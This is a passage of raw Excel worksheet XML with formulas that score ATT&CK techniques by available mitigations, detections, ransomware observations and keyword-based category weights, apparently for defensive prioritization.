        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K434">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L434">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M434" s="25">
        <v>0</v>
      </c>
      <c r="N434" s="51">
        <v>0</v>
      </c>
      <c r="O434" s="51">
        <v>0</v>
      </c>
      <c r="P434" s="51">
        <v>0</v>
      </c>
      <c r="Q434" s="51">
        <v>0</v>
      </c>
      <c r="R434" s="52" t="s">
        <v>1594</v>
      </c>
      <c r="S434" s="51">
        <v>2</v>
      </c>
      <c r="T434" s="51"/>
      <c r="U434" s="51">
        <v>0</v>
      </c>
      <c r="V434" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>1.9047619047619049E-2</v>
      </c>
      <c r="W434">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>2</v>
      </c>
      <c r="X434">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>3.6363636363636362E-2</v>
      </c>
      <c r="Y434">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>3.6363636363636362E-2</v>
      </c>
      <c r="Z434">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA434">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB434">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC434" s="29" t="s">
        <v>665</v>
      </c>
      <c r="AD434" s="25" t="str" cm="1">
        <f t="array" ref="AD434">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC434)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE434" s="25">
        <f>IF(AD434="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF434" s="25" t="str" cm="1">
        <f t="array" ref="AF434">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC434)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG434" s="25">
        <f>IF(AF434="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH434" s="25" t="str" cm="1">
        <f t="array" ref="AH434">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC434)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI434" s="25">
        <f>IF(AH434="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ434" s="25" t="str" cm="1">
        <f t="array" ref="AJ434">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC434)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK434" s="25">
        <f>IF(AJ434="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL434" s="25" t="str" cm="1">
        <f t="array" ref="AL434">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC434)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM434" s="25">
        <f>IF(AL434="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN434" s="52">
        <v>0</v>
      </c>
      <c r="AO434" s="51">
        <v>0</v>
      </c>
      <c r="AP434" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>6.9047619047619049E-3</v>
      </c>
      <c r="AQ434" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>2.3015873015873017E-2</v>
      </c>
      <c r="AR434" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>2.3015873015873017E-2</v>
      </c>
      <c r="AS434" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT434" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU43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35" spans="1:47">
      <c r="A435" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>6.9047619047619049E-3</v>
      </c>
      <c r="B435" s="25">
        <f>SUM(H435,M435,V435)*(1+SUM(AE435,AG435,AI435,AK435,AM435))</f>
        <v>6.9047619047619052E-2</v>
      </c>
      <c r="C435" s="25" t="s">
        <v>1634</v>
      </c>
      <c r="D435" s="25" t="s">
        <v>1593</v>
      </c>
      <c r="E435" s="25" t="s">
        <v>1635</v>
      </c>
      <c r="F435" s="51">
        <v>0</v>
      </c>
      <c r="G435" s="51">
        <v>1</v>
      </c>
      <c r="H435" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I435">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J435">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K435">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L435">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M435" s="25">
        <v>0</v>
      </c>
      <c r="N435" s="51">
        <v>0</v>
      </c>
      <c r="O435" s="51">
        <v>0</v>
      </c>
      <c r="P435" s="51">
        <v>0</v>
      </c>
      <c r="Q435" s="51">
        <v>0</v>
      </c>
      <c r="R435" s="52" t="s">
        <v>1594</v>
      </c>
      <c r="S435" s="51">
        <v>2</v>
      </c>
      <c r="T435" s="51"/>
      <c r="U435" s="51">
        <v>0</v>
      </c>
      <c r="V435" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>1.9047619047619049E-2</v>
      </c>
      <c r="W435">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>2</v>
      </c>
      <c r="X435">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>3.6363636363636362E-2</v>
      </c>
      <c r="Y435">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>3.6363636363636362E-2</v>
      </c>
      <c r="Z435">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA435">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB435">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC435" s="29" t="s">
        <v>665</v>
      </c>
      <c r="AD435" s="25" t="str" cm="1">
        <f t="array" ref="AD435">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC435)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE435" s="25">
        <f>IF(AD435="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF435" s="25" t="str" cm="1">
        <f t="array" ref="AF435">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC435)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG435" s="25">
        <f>IF(AF435="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH435" s="25" t="str" cm="1">
        <f t="array" ref="AH435">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC435)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI435" s="25">
        <f>IF(AH435="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ435" s="25" t="str" cm="1">
        <f t="array" ref="AJ435">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC435)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK435" s="25">
        <f>IF(AJ435="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL435" s="25" t="str" cm="1">
        <f t="array" ref="AL435">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC435)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM435" s="25">
        <f>IF(AL435="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN435" s="52">
        <v>0</v>
      </c>
      <c r="AO435" s="51">
        <v>0</v>
      </c>
      <c r="AP435" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>6.9047619047619049E-3</v>
      </c>
      <c r="AQ435" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>2.3015873015873017E-2</v>
      </c>
      <c r="AR435" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>2.3015873015873017E-2</v>
      </c>
      <c r="AS435" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT435" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU43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36" spans="1:47">
      <c r="A436" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>6.9047619047619049E-3</v>
      </c>
      <c r="B436" s="25">
        <f>SUM(H436,M436,V436)*(1+SUM(AE436,AG436,AI436,AK436,AM436))</f>
        <v>6.9047619047619052E-2</v>
      </c>
      <c r="C436" s="25" t="s">
        <v>1636</v>
      </c>
      <c r="D436" s="25" t="s">
        <v>1593</v>
      </c>
      <c r="E436" s="25" t="s">
        <v>1637</v>
      </c>
      <c r="F436" s="51">
        <v>0</v>
      </c>
      <c r="G436" s="51">
        <v>1</v>
      </c>
      <c r="H436" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I436">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J436">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K436">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L436">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M436" s="25">
        <v>0</v>
      </c>
      <c r="N436" s="51">
        <v>0</v>
      </c>
      <c r="O436" s="51">
        <v>0</v>
      </c>
      <c r="P436" s="51">
        <v>0</v>
      </c>
      <c r="Q436" s="51">
        <v>0</v>
      </c>
      <c r="R436" s="52" t="s">
        <v>1594</v>
      </c>
      <c r="S436" s="51">
        <v>2</v>
      </c>
      <c r="T436" s="51"/>
      <c r="U436" s="51">
        <v>0</v>
      </c>
      <c r="V436" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>1.9047619047619049E-2</v>
      </c>
      <c r="W436">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>2</v>
      </c>
      <c r="X436">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>3.6363636363636362E-2</v>
      </c>
      <c r="Y436">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>3.6363636363636362E-2</v>
      </c>
      <c r="Z436">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA436">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB436">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC436" s="29"/>
      <c r="AD436" s="25" t="str" cm="1">
        <f t="array" ref="AD436">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC436)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE436" s="25">
        <f>IF(AD436="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF436" s="25" t="str" cm="1">
        <f t="array" ref="AF436">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC436)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG436" s="25">
        <f>IF(AF436="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH436" s="25" t="str" cm="1">
        <f t="array" ref="AH436">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC436)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI436" s="25">
        <f>IF(AH436="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ436" s="25" t="str" cm="1">
        <f t="array" ref="AJ436">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC436)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK436" s="25">
        <f>IF(AJ436="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL436" s="25" t="str" cm="1">
        <f t="array" ref="AL436">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC436)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM436" s="25">
        <f>IF(AL436="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN436" s="52">
        <v>0</v>
      </c>
      <c r="AO436" s="51">
        <v>0</v>
      </c>
      <c r="AP436" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>6.9047619047619049E-3</v>
      </c>
      <c r="AQ436" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>2.3015873015873017E-2</v>
      </c>
      <c r="AR436" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>2.3015873015873017E-2</v>
      </c>
      <c r="AS436" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT436" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU43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37" spans="1:47" ht="63.95">
      <c r="A437" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>8.0928571428571433E-2</v>
      </c>
      <c r="B437" s="25">
        <f>SUM(H437,M437,V437)*(1+SUM(AE437,AG437,AI437,AK437,AM437))</f>
        <v>0.14261904761904762</v>
      </c>
      <c r="C437" s="25" t="s">
        <v>1638</v>
      </c>
      <c r="D437" s="25" t="s">
        <v>276</v>
      </c>
      <c r="E437" s="25" t="s">
        <v>1639</v>
      </c>
      <c r="F437" s="51">
        <v>1</v>
      </c>
      <c r="G437" s="51">
        <v>1</v>
      </c>
      <c r="H437" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I437">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J437">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K437">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L437">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M437" s="25">
        <v>0</v>
      </c>
      <c r="N437" s="51">
        <v>1</v>
      </c>
      <c r="O437" s="51">
        <v>2</v>
      </c>
      <c r="P437" s="51">
        <v>1</v>
      </c>
      <c r="Q437" s="51">
        <v>0</v>
      </c>
      <c r="R437" s="51"/>
      <c r="S437" s="51">
        <v>0</v>
      </c>
      <c r="T437" s="51"/>
      <c r="U437" s="51">
        <v>0</v>
      </c>
      <c r="V437" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>1.9047619047619046E-2</v>
      </c>
      <c r="W437">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X437">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y437">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z437">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>4</v>
      </c>
      <c r="AA437">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.04</v>
      </c>
      <c r="AB437">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.04</v>
      </c>
      <c r="AC437" s="29" t="s">
        <v>1640</v>
      </c>
      <c r="AD437" s="25" t="str" cm="1">
        <f t="array" ref="AD437">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC437)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE437" s="25">
        <f>IF(AD437="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF437" s="25" t="str" cm="1">
        <f t="array" ref="AF437">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC437)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG437" s="25">
        <f>IF(AF437="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH437" s="25" t="str" cm="1">
        <f t="array" ref="AH437">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC437)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI437" s="25">
        <f>IF(AH437="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ437" s="25" t="str" cm="1">
        <f t="array" ref="AJ437">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC437)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK437" s="25">
        <f>IF(AJ437="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL437" s="25" t="str" cm="1">
        <f t="array" ref="AL437">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC437)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AM437" s="25">
        <f>IF(AL437="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN437" s="60">
        <v>2</v>
      </c>
      <c r="AO437" s="51">
        <v>1</v>
      </c>
      <c r="AP437" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>8.0928571428571433E-2</v>
      </c>
      <c r="AQ437" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>4.7539682539682541E-2</v>
      </c>
      <c r="AR437" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>4.7539682539682541E-2</v>
      </c>
      <c r="AS437" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AT437" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AU43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38" spans="1:47">
      <c r="A438" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.6809523809523808E-2</v>
      </c>
      <c r="B438" s="25">
        <f>SUM(H438,M438,V438)*(1+SUM(AE438,AG438,AI438,AK438,AM438))</f>
        <v>0.13476190476190478</v>
      </c>
      <c r="C438" s="25" t="s">
        <v>1641</v>
      </c>
      <c r="D438" s="25" t="s">
        <v>148</v>
      </c>
      <c r="E438" s="25" t="s">
        <v>1642</v>
      </c>
      <c r="F438" s="51">
        <v>1</v>
      </c>
      <c r="G438" s="51">
        <v>1</v>
      </c>
      <c r="H438" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I438">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J438">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K438">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L438">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M438" s="25">
        <v>0</v>
      </c>
      <c r="N438" s="51">
        <v>0</v>
      </c>
      <c r="O438" s="51">
        <v>2</v>
      </c>
      <c r="P438" s="51">
        <v>0</v>
      </c>
      <c r="Q438" s="51">
        <v>2</v>
      </c>
      <c r="R438" s="51"/>
      <c r="S438" s="51">
        <v>0</v>
      </c>
      <c r="T438" s="51"/>
      <c r="U438" s="51">
        <v>0</v>
      </c>
      <c r="V438" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>1.9047619047619046E-2</v>
      </c>
      <c r="W438">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X438">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y438">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z438">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>4</v>
      </c>
      <c r="AA438">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.04</v>
      </c>
      <c r="AB438">
